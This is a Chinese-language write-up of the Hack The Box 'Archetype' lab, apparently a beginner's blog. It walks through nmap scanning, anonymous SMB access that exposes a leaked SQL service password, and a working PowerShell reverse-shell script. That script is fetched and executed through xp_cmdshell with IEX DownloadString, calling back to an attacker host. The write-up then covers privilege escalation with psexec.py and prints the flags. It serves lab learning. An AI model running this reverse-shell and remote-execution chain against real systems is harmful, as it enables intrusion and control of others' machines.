刚开始玩hack the box,需要了解一些东西
改善vpn连接的方法
首先用nmap扫描端口
开放了135,139,445,1433四个端口
445,139:SMB协议端口,存在风险
1433:sql server端口
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-20 20:27 CST Nmap scan report for 10.10.10.27 Host is up (0.30s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds 1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM | ms-sql-ntlm-info: | Target_Name: ARCHETYPE | NetBIOS_Domain_Name: ARCHETYPE | NetBIOS_Computer_Name: ARCHETYPE | DNS_Domain_Name: Archetype | DNS_Computer_Name: Archetype |_ Product_Version: 10.0.17763 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2021-09-20T12:47:39 |_Not valid after: 2051-09-20T12:47:39 |_ssl-date: 2021-09-20T12:53:19+00:00; +25m03s from scanner time. 1782/tcp filtered hp-hcip Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 1h49m04s, deviation: 3h07m52s, median: 25m02s | ms-sql-info: | 10.10.10.27:1433: | Version: | name: Microsoft SQL Server 2017 RTM | number: 14.00.1000.00 | Product: Microsoft SQL Server 2017 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | smb-os-discovery: | OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3) | Computer name: Archetype | NetBIOS computer name: ARCHETYPE\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2021-09-20T05:53:08-07:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-09-20T12:53:04 |_ start_date: N/A
可以看见很多主机信息
利用445端口可以用smb工具匿名访问一下
smbclient -N -L 10.10.10.27
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin backups Disk C$ Disk Default share IPC$ IPC Remote IPC SMB1 disabled -- no workgroup available
smbclient用法汇总
其他三个都看不了,只能看backups
smbclient -N \\\\10.10.10.27\\backups 1 ⨯ Try "help" to get a list of possible commands. smb: \> ls . D 0 Mon Jan 20 20:20:57 2020 .. D 0 Mon Jan 20 20:20:57 2020 prod.dtsConfig AR 609 Mon Jan 20 20:23:02 2020 10328063 blocks of size 4096. 8260445 blocks available
这个配置文件的信息里有一个id和密码
<DTSConfiguration> <DTSConfigurationHeading> <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/> </DTSConfigurationHeading> <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String"> <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue> </Configuration> </DTSConfiguration>
Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc
利用mssqlclient.py尝试连接数据库获得部分权限
python3 mssqlclient.py sql_svc@10.10.10.27 -windows-auth
成功连接,获得部分权限
当前用户是archetype\sql_svc
一、【尝试】用cs看看能不能上线
尝试失败,dnslog都不通,怀疑是靶机问题
二、反弹shell
1.生成反弹shell脚本:
shell.ps1
$client = New-Object System.Net.Sockets.TCPClient("10.10.16.45",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
此处要修改为当前自己kali的ip地址
2.打开存放脚本的文件夹,用python建立服务
sudo python3 -m http.server 80
监听刚刚设置的端口
sudo nc -lvnp 443
3.用刚刚连接到的mssqlshell来反弹
EXEC xp_cmdshell 'echo IEX (New-Object Net.WebClient).DownloadString("http://10.10.16.45/shell.ps1") | powershell -noprofile'
成功反弹:
在桌面发现flag,user.txt
# cd desktop # ls Directory: C:\Users\sql_svc\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 2/25/2020 6:37 AM 32 user.txt # more user.txt 3e7b102e78218e935bf3f4951fec21a3 # ^C
需要获得administrator权限
通过命令历史记录查找到管理员密码,然后通过psexec.py来连接
获取普通用户权限后进一步研究如何获取管理员权限,从上面可知archetype\sql_svc具有三重用户身份:操作系统普通用户、数据库用户、数据库服务运行用户,此类用户通常在操作系统中具有超出其他普通用户的权限,比如执行高权限命令、访问特殊文件等,检查一下powershell的历史记录。
通过psexec.py来连接
在管理员的桌面找到flag
1.思路:nmap信息搜集,可以利用的445端口,开了sql server 的服务,搜集主机相关信息,用泄漏的用户密码连接数据库服务,然后拿到这个mssqlshell,开始反弹shell,提权,拿到所有flag
2.Impacket使用
3.反弹shell步骤,生产代码
快速生成反弹shell
powercat
4.smb协议
https://blog.csdn.net/ZiXuanFY/article/details/52513512?utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.no_search_link&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.no_search_link
打完第一关